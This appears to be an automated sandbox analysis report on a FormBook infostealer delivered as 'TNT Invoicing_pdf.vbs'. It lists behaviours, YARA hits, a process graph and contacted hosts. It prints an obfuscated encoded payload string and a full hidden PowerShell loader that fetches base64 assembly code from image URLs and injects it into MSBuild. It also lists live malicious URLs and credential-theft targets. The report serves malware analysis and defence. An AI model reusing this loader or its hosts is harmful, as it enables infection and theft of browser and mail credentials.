gtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredydgtrengdgtrevdgtredkdgtrenwdgtre4dgtrec8dgtrezgb1dgtregwdgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredidgtrenqdgtre4dgtredgdgtrendgtredgtre2dgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }" Jump to behavior
Source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2364296581.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370969245.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368267619.00000000017A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2364296581.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370969245.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368267619.00000000017A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2364296581.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370969245.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368267619.00000000017A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2364296581.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370969245.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368267619.00000000017A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\SyncHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427200 Sample: TNT Invoicing_pdf.vbs Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 51 paste.ee 2->51 53 www.rhyme.academy 2->53 55 5 other IPs or domains 2->55 71 Snort IDS alert for network traffic 2->71 73 Multi AV Scanner detection for domain / URL 2->73 75 Malicious sample detected (through community Yara rule) 2->75 79 11 other signatures 2->79 12 wscript.exe 16 2->12         started        signatures3 77 Connects to a pastebin service (likely for C&C) 51->77 process4 dnsIp5 63 paste.ee 104.21.84.67, 443, 49699 CLOUDFLARENETUS United States 12->63 99 System process connects to network (likely due to code injection or exploit) 12->99 101 VBScript performs obfuscated calls to suspicious functions 12->101 103 Uses certutil -decode 12->103 105 6 other signatures 12->105 16 powershell.exe 7 12->16         started        19 cmd.exe 2 12->19         started        22 certutil.exe 1 12->22         started        signatures6 process7 file8 65 Suspicious powershell command line found 16->65 67 Found suspicious powershell code related to unpacking or dynamic code loading 16->67 24 powershell.exe 14 15 16->24         started        28 conhost.exe 16->28         started        49 C:\Users\user\AppData\Local\...\PicList.txt, ASCII 19->49 dropped 30 conhost.exe 19->30         started        32 conhost.exe 22->32         started        signatures9 process10 dnsIp11 57 uploaddeimagens.com.br 172.67.215.45, 443, 49700, 49701 CLOUDFLARENETUS United States 24->57 59 fanconom.shop 185.61.152.60, 443, 49702 NAMECHEAP-NETUS United Kingdom 24->59 93 Writes to foreign memory regions 24->93 95 Injects a PE file into a foreign processes 24->95 34 MSBuild.exe 24->34         started        signatures12 process13 signatures14 69 Maps a DLL or memory area into another process 34->69 37 SYYSBomrTxWSggG.exe 34->37 injected process15 signatures16 81 Maps a DLL or memory area into another process 37->81 83 Found direct / indirect Syscall (likely to bypass EDR) 37->83 40 SyncHost.exe 13 37->40         started        process17 signatures18 85 Tries to steal Mail credentials (via file / registry access) 40->85 87 Tries to harvest and steal browser information (history, passwords, etc) 40->87 89 Maps a DLL or memory area into another process 40->89 91 Queues an APC in another process (thread injection) 40->91 43 SYYSBomrTxWSggG.exe 40->43 injected 47 firefox.exe 40->47         started        process19 dnsIp20 61 www.rhyme.academy 216.40.34.41, 49709, 80 TUCOWSCA Canada 43->61 97 Found direct / indirect Syscall (likely to bypass EDR) 43->97 signatures21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.84.67
 paste.ee United States
13335 CLOUDFLARENETUS false
172.67.215.45
 uploaddeimagens.com.br United States
13335 CLOUDFLARENETUS true
185.61.152.60
 fanconom.shop United Kingdom
22612 NAMECHEAP-NETUS false
216.40.34.41
 www.rhyme.academy Canada
15348 TUCOWSCA true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
www.rhyme.academy 216.40.34.41 true
paste.ee 104.21.84.67 true
fanconom.shop 185.61.152.60 true
uploaddeimagens.com.br 172.67.215.45 true
fp2e7a.wpc.phicdn.net 192.229.211.108 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://paste.ee/d/z0DWX false
    		high
    https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500 true unknown
    https://fanconom.shop/grace/gf.txt false
      		unknown
      http://www.rhyme.academy/avr4/?-zd=Xr58V0PHlxJ&0Zut6f=x3E/o0JgLrsAY3mnIEvxKvoKIfHhyrIBWJwB0arEEJoLlbt8V3ExA9cg1sEiGVbm5mLCkgWBOmXsxt02WvVKyLItEbcRwm1+9Ok94pNpJk46kEUPTjVsVLh1d58gSyvREgIt0DM= true
        		unknown
        https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469 true unknown